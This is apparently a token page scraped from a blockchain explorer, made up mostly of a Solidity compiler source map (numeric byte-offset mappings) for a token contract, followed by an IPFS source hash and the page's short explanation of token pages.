15902:373:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8878:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11759:169;;;;;;:::i;:::-;;:::i;:::-;;;2750:14:1;;2743:22;2725:41;;2713:2;2698:18;11759:169:0;2680:92:1;10163:108:0;10251:12;;10163:108;;;7082:25:1;;;7070:2;7055:18;10163:108:0;7037:76:1;11934:418:0;;;;;;:::i;:::-;;:::i;16172:100::-;;;7290:4:1;16255:9:0;7278:17:1;7260:36;;7248:2;7233:18;16172:100:0;7215:87:1;13053:215:0;;;;;;:::i;:::-;;:::i;10589:127::-;;;;;;:::i;:::-;-1:-1:-1;;;;;10690:18:0;10663:7;10690:18;;;:9;:18;;;;;;;10589:127;7758:132;;;:::i;:::-;;6858:20;;;;;-1:-1:-1;;;;;6858:20:0;;;;;;-1:-1:-1;;;;;2541:32:1;;;2523:51;;2511:2;2496:18;6858:20:0;2478:102:1;9297:104:0;;;:::i;13274:375::-;;;;;;:::i;:::-;;:::i;11086:510::-;;;;;;:::i;:::-;;:::i;12879:164::-;;;;;;:::i;:::-;;:::i;11602:151::-;;;;;;:::i;:::-;-1:-1:-1;;;;;11718:18:0;;;11691:7;11718:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;11602:151;9628:108;;;;;;:::i;:::-;;:::i;8878:100::-;8932:13;8965:5;8958:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8878:100;:::o;11759:169::-;11842:4;11859:39;6612:10;11882:7;11891:6;11859:8;:39::i;:::-;-1:-1:-1;11916:4:0;11759:169;;;;;:::o;11934:418::-;12040:4;12057:36;12067:6;12075:9;12086:6;12057:9;:36::i;:::-;-1:-1:-1;;;;;12131:19:0;;12104:24;12131:19;;;:11;:19;;;;;;;;6612:10;12131:33;;;;;;;;12183:26;;;;12175:79;;;;-1:-1:-1;;;12175:79:0;;5151:2:1;12175:79:0;;;5133:21:1;5190:2;5170:18;;;5163:30;5229:34;5209:18;;;5202:62;-1:-1:-1;;;5280:18:1;;;5273:38;5328:19;;12175:79:0;;;;;;;;;12265:57;12274:6;6612:10;12296:25;12315:6;12296:16;:25;:::i;:::-;12265:8;:57::i;:::-;-1:-1:-1;12340:4:0;;11934:418;-1:-1:-1;;;;11934:418:0:o;13053:215::-;6612:10;13141:4;13190:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;13190:34:0;;;;;;;;;;13141:4;;13158:80;;13181:7;;13190:47;;13227:10;;13190:47;:::i;7758:132::-;7192:10;;-1:-1:-1;;;;;7192:10:0;6612;7192:26;7184:71;;;;-1:-1:-1;;;7184:71:0;;;;;;;:::i;:::-;7834:5:::1;::::0;7826:26:::1;::::0;7849:1:::1;::::0;-1:-1:-1;;;;;7834:5:0::1;::::0;7826:26:::1;::::0;7849:1;;7826:26:::1;7864:5;:18:::0;;-1:-1:-1;;;;;;7864:18:0::1;::::0;;7758:132::o;9297:104::-;9353:13;9386:7;9379:14;;;;;:::i;13274:375::-;6612:10;13367:4;13411:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;13411:34:0;;;;;;;;;;13464:35;;;;13456:85;;;;-1:-1:-1;;;13456:85:0;;6732:2:1;13456:85:0;;;6714:21:1;6771:2;6751:18;;;6744:30;6810:34;6790:18;;;6783:62;-1:-1:-1;;;6861:18:1;;;6854:35;6906:19;;13456:85:0;6704:227:1;13456:85:0;13552:67;6612:10;13575:7;13584:34;13603:15;13584:16;:34;:::i;13552:67::-;-1:-1:-1;13637:4:0;;13274:375;-1:-1:-1;;;13274:375:0:o;11086:510::-;11165:4;11186:10;;-1:-1:-1;;;;;11186:10:0;6612;11186:26;11185:45;;;;-1:-1:-1;11218:5:0;;;;:11;;:5;:11;11185:45;11182:407;;;11232:42;6612:10;11242:12;11256:9;11267:6;11232:9;:42::i;:::-;-1:-1:-1;11276:5:0;:11;;-1:-1:-1;;11276:11:0;;;;11288;;11182:407;11320:10;;-1:-1:-1;;;;;11320:10:0;6612;11320:26;11319:46;;;;-1:-1:-1;11352:5:0;;;;:12;11319:46;11316:273;;;11380:12;;:24;;11397:6;11380:16;:24::i;:::-;11367:12;:37;-1:-1:-1;;;;;11426:20:0;;;;;;:9;:20;;;;;;:32;;11451:6;11426:24;:32::i;:::-;-1:-1:-1;;;;;11405:20:0;;;;;;:9;:20;;;;;;;:53;;;;11464:38;;11405:20;;11464:38;;;;11495:6;7082:25:1;;7070:2;7055:18;;7037:76;11464:38:0;;;;;;;;-1:-1:-1;11511:4:0;11504:11;;11316:273;11532:42;6612:10;11542:12;6532:98;11532:42;-1:-1:-1;11583:4:0;11576:11;;12879:164;7192:10;;-1:-1:-1;;;;;7192:10:0;6612;7192:26;7184:71;;;;-1:-1:-1;;;7184:71:0;;;;;;;:::i;:::-;12955:9:::1;12950:86;12974:7;:14;12970:1;:18;12950:86;;;13010:23;13022:7;13030:1;13022:10;;;;;;;;:::i;:::-;;;;;;;13010:11;:23::i;:::-;12990:3:::0;::::1;::::0;::::1;:::i;:::-;;;;12950:86;;;;12879:164:::0;:::o;9628:108::-;7192:10;;-1:-1:-1;;;;;7192:10:0;6612;7192:26;7184:71;;;;-1:-1:-1;;;7184:71:0;;;;;;;:::i;:::-;9703:6:::1;:25:::0;;-1:-1:-1;;;;;;9703:25:0::1;-1:-1:-1::0;;;;;9703:25:0;;;::::1;::::0;;;::::1;::::0;;9628:108::o;15187:344::-;-1:-1:-1;;;;;15289:19:0;;15281:68;;;;-1:-1:-1;;;15281:68:0;;6327:2:1;15281:68:0;;;6309:21:1;6366:2;6346:18;;;6339:30;6405:34;6385:18;;;6378:62;-1:-1:-1;;;6456:18:1;;;6449:34;6500:19;;15281:68:0;6299:226:1;15281:68:0;-1:-1:-1;;;;;15368:21:0;;15360:68;;;;-1:-1:-1;;;15360:68:0;;3985:2:1;15360:68:0;;;3967:21:1;4024:2;4004:18;;;3997:30;4063:34;4043:18;;;4036:62;-1:-1:-1;;;4114:18:1;;;4107:32;4156:19;;15360:68:0;3957:224:1;15360:68:0;-1:-1:-1;;;;;15439:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;15491:32;;7082:25:1;;;15491:32:0;;7055:18:1;15491:32:0;;;;;;;15187:344;;;:::o;13655:808::-;-1:-1:-1;;;;;13761:20:0;;13753:70;;;;-1:-1:-1;;;13753:70:0;;5921:2:1;13753:70:0;;;5903:21:1;5960:2;5940:18;;;5933:30;5999:34;5979:18;;;5972:62;-1:-1:-1;;;6050:18:1;;;6043:35;6095:19;;13753:70:0;5893:227:1;13753:70:0;-1:-1:-1;;;;;13842:23:0;;13834:71;;;;-1:-1:-1;;;13834:71:0;;3581:2:1;13834:71:0;;;3563:21:1;3620:2;3600:18;;;3593:30;3659:34;3639:18;;;3632:62;-1:-1:-1;;;3710:18:1;;;3703:33;3753:19;;13834:71:0;3553:225:1;13834:71:0;13933:6;;-1:-1:-1;;;;;13920:19:0;;;13933:6;;13920:19;13916:63;;;-1:-1:-1;;;;;13960:15:0;;;;;;:7;:15;;;;;;;;13952:24;;;;;;-1:-1:-1;;;;;14013:17:0;;13989:21;14013:17;;;:9;:17;;;;;;14049:23;;;;14041:74;;;;-1:-1:-1;;;14041:74:0;;4744:2:1;14041:74:0;;;4726:21:1;4783:2;4763:18;;;4756:30;4822:34;4802:18;;;4795:62;-1:-1:-1;;;4873:18:1;;;4866:36;4919:19;;14041:74:0;4716:228:1;14041:74:0;14146:22;14162:6;14146:13;:22;:::i;:::-;-1:-1:-1;;;;;14126:17:0;;;;;;;:9;:17;;;;;;:42;;;;14179:20;;;;;;;;:30;;14203:6;;14126:17;14179:30;;14203:6;;14179:30;:::i;:::-;;;;;;;;14242:9;-1:-1:-1;;;;;14225:35:0;14234:6;-1:-1:-1;;;;;14225:35:0;;14253:6;14225:35;;;;7082:25:1;;7070:2;7055:18;;7037:76;14225:35:0;;;;;;;;13742:721;13655:808;;;:::o;2640:181::-;2698:7;;2730:5;2734:1;2730;:5;:::i;:::-;2718:17;;2759:1;2754;:6;;2746:46;;;;-1:-1:-1;;;2746:46:0;;4388:2:1;2746:46:0;;;4370:21:1;4427:2;4407:18;;;4400:30;4466:29;4446:18;;;4439:57;4513:18;;2746:46:0;4360:177:1;2746:46:0;2812:1;2640:181;-1:-1:-1;;;2640:181:0:o;12728:95::-;7192:10;;-1:-1:-1;;;;;7192:10:0;6612;7192:26;7184:71;;;;-1:-1:-1;;;7184:71:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;12793:15:0::1;;::::0;;;:7:::1;:15;::::0;;;;:22;;-1:-1:-1;;12793:22:0::1;12811:4;12793:22;::::0;;12728:95::o;14:173:1:-;82:20;;-1:-1:-1;;;;;131:31:1;;121:42;;111:2;;177:1;174;167:12;111:2;63:124;;;:::o;192:186::-;251:6;304:2;292:9;283:7;279:23;275:32;272:2;;;320:1;317;310:12;272:2;343:29;362:9;343:29;:::i;383:260::-;451:6;459;512:2;500:9;491:7;487:23;483:32;480:2;;;528:1;525;518:12;480:2;551:29;570:9;551:29;:::i;:::-;541:39;;599:38;633:2;622:9;618:18;599:38;:::i;:::-;589:48;;470:173;;;;;:::o;648:328::-;725:6;733;741;794:2;782:9;773:7;769:23;765:32;762:2;;;810:1;807;800:12;762:2;833:29;852:9;833:29;:::i;:::-;823:39;;881:38;915:2;904:9;900:18;881:38;:::i;:::-;871:48;;966:2;955:9;951:18;938:32;928:42;;752:224;;;;;:::o;981:254::-;1049:6;1057;1110:2;1098:9;1089:7;1085:23;1081:32;1078:2;;;1126:1;1123;1116:12;1078:2;1149:29;1168:9;1149:29;:::i;:::-;1139:39;1225:2;1210:18;;;;1197:32;;-1:-1:-1;;;1068:167:1:o;1240:1132::-;1324:6;1355:2;1398;1386:9;1377:7;1373:23;1369:32;1366:2;;;1414:1;1411;1404:12;1366:2;1454:9;1441:23;1483:18;1524:2;1516:6;1513:14;1510:2;;;1540:1;1537;1530:12;1510:2;1578:6;1567:9;1563:22;1553:32;;1623:7;1616:4;1612:2;1608:13;1604:27;1594:2;;1645:1;1642;1635:12;1594:2;1681;1668:16;1703:2;1699;1696:10;1693:2;;;1709:18;;:::i;:::-;1755:2;1752:1;1748:10;1787:2;1781:9;1850:2;1846:7;1841:2;1837;1833:11;1829:25;1821:6;1817:38;1905:6;1893:10;1890:22;1885:2;1873:10;1870:18;1867:46;1864:2;;;1916:18;;:::i;:::-;1952:2;1945:22;2002:18;;;2036:15;;;;-1:-1:-1;2071:11:1;;;2101;;;2097:20;;2094:33;-1:-1:-1;2091:2:1;;;2140:1;2137;2130:12;2091:2;2162:1;2153:10;;2172:169;2186:2;2183:1;2180:9;2172:169;;;2243:23;2262:3;2243:23;:::i;:::-;2231:36;;2204:1;2197:9;;;;;2287:12;;;;2319;;2172:169;;;-1:-1:-1;2360:6:1;1335:1037;-1:-1:-1;;;;;;;;1335:1037:1:o;2777:597::-;2889:4;2918:2;2947;2936:9;2929:21;2979:6;2973:13;3022:6;3017:2;3006:9;3002:18;2995:34;3047:1;3057:140;3071:6;3068:1;3065:13;3057:140;;;3166:14;;;3162:23;;3156:30;3132:17;;;3151:2;3128:26;3121:66;3086:10;;3057:140;;;3215:6;3212:1;3209:13;3206:2;;;3285:1;3280:2;3271:6;3260:9;3256:22;3252:31;3245:42;3206:2;-1:-1:-1;3358:2:1;3337:15;-1:-1:-1;;3333:29:1;3318:45;;;;3365:2;3314:54;;2898:476;-1:-1:-1;;;2898:476:1:o;5358:356::-;5560:2;5542:21;;;5579:18;;;5572:30;5638:34;5633:2;5618:18;;5611:62;5705:2;5690:18;;5532:182::o;7307:128::-;7347:3;7378:1;7374:6;7371:1;7368:13;7365:2;;;7384:18;;:::i;:::-;-1:-1:-1;7420:9:1;;7355:80::o;7440:125::-;7480:4;7508:1;7505;7502:8;7499:2;;;7513:18;;:::i;:::-;-1:-1:-1;7550:9:1;;7489:76::o;7570:380::-;7649:1;7645:12;;;;7692;;;7713:2;;7767:4;7759:6;7755:17;7745:27;;7713:2;7820;7812:6;7809:14;7789:18;7786:38;7783:2;;;7866:10;7861:3;7857:20;7854:1;7847:31;7901:4;7898:1;7891:15;7929:4;7926:1;7919:15;7783:2;;7625:325;;;:::o;7955:135::-;7994:3;-1:-1:-1;;8015:17:1;;8012:2;;;8035:18;;:::i;:::-;-1:-1:-1;8082:1:1;8071:13;;8002:88::o;8095:127::-;8156:10;8151:3;8147:20;8144:1;8137:31;8187:4;8184:1;8177:15;8211:4;8208:1;8201:15;8227:127;8288:10;8283:3;8279:20;8276:1;8269:31;8319:4;8316:1;8309:15;8343:4;8340:1;8333:15;8359:127;8420:10;8415:3;8411:20;8408:1;8401:31;8451:4;8448:1;8441:15;8475:4;8472:1;8465:15

Swarm Source

ipfs://8e3fa54413b6f5722814f1ff4dd1f3a09c371cd61be5475815ed33760b613795
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.